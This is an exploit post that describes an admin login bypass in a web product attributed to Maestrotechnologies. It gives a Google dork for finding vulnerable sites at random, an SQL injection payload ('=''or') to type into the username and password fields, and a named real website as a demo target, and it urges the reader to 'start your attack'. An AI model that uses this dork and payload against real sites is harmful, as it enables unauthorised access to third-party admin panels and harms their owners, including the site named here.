Exploit Title : Maestrotechnologies Admin Bypass
Google Dork : intext:Site Design by UTSWebSolutions.com inurl:"/admin.php"
Date : 02/06/2017
Exploit Author : Mohammad Babaee
Vendor Homepage : http://maestrotech.in/
Software Link : http://maestrotech.in/
Version : 1.0
Tested on : Windows10 , Firefox
################################################################
Proof of concept : Maestrotechnologies Admin Bypass
1 - Search this Google Dork : intext:Site Design by UTSWebSolutions.com inurl:"/admin.php"
2 - Find Websites With Admin Bypass BUG
3 - Open One of them ( Random )
4 - Attention to end of URL , Like: ( /admin.php )
5 - Put Username & Password Field with : ( '=''or' ) .... now , Start Your Attack ;)
6 - The End , Enjoy Of Hacking ...!
DEMO :
http://www.reliantelevators.com/admin.php [AdminPage Bypass VULNERABILITY]
# Discovered by : Mohammad Babaee
# Special thanks to : Behrouz Mansoori